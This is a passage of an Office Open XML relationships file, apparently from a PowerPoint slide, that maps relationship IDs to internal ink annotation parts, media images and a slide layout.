Target="../ink/ink659.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink670.xml"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink681.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image257.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink601.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink606.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image910.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink620.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1711.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink628.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink636.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3010.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink667.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink654.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink676.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink592.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink596.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink612.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink615.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1211.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink623.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink631.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2510.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3310.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink644.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink651.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink662.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink646.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink671.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image940.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink684.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink591.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image452.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink602.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink607.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image710.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink618.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink626.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2011.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2810.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink639.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink657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711.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink665.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink679.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink597.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.png"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink608.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink613.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink621.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1511.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink634.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3810.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2311.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink642.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink647.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink652.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink660.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink674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260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink682.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3410.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink598.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink603.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink616.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1011.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink629.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3110.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1811.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink637.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink655.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink668.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink589.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink677.xml"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image248.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink593.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink609.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image511.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink624.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2610.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1311.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink632.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3610.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink645.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink648.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink663.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink672.xml"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink680.xml"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink590.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink604.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink619.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2111.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink599.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image811.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink627.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2910.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink640.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink658.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink666.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink675.xml"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink594.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image456.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink614.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1611.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink685.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink610.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink622.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2410.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink635.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink643.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image480.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink653.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3210.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink649.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink661.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink669.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink683.xml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27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink605.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink600.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image459.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink617.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1111.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1911.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink630.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink638.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2710.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink656.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink678.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink664.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29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90.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png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33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink706.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image610.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1411.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink720.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink728.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2211.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink736.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3710.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3910.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink744.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink755.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink696.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink701.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image910.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink715.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1711.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink723.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink731.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3010.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink750.xml"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink758.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink687.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink691.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink707.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink710.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1211.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink718.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink726.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2510.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3310.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink739.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink745.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink741.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink753.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image452.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink697.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink702.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink705.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image710.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink713.xml"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink717.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink721.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2011.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2410.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink730.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2810.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink734.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink738.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3210.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink743.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink748.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink752.xml"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink761.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink763.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink692.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image451.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" 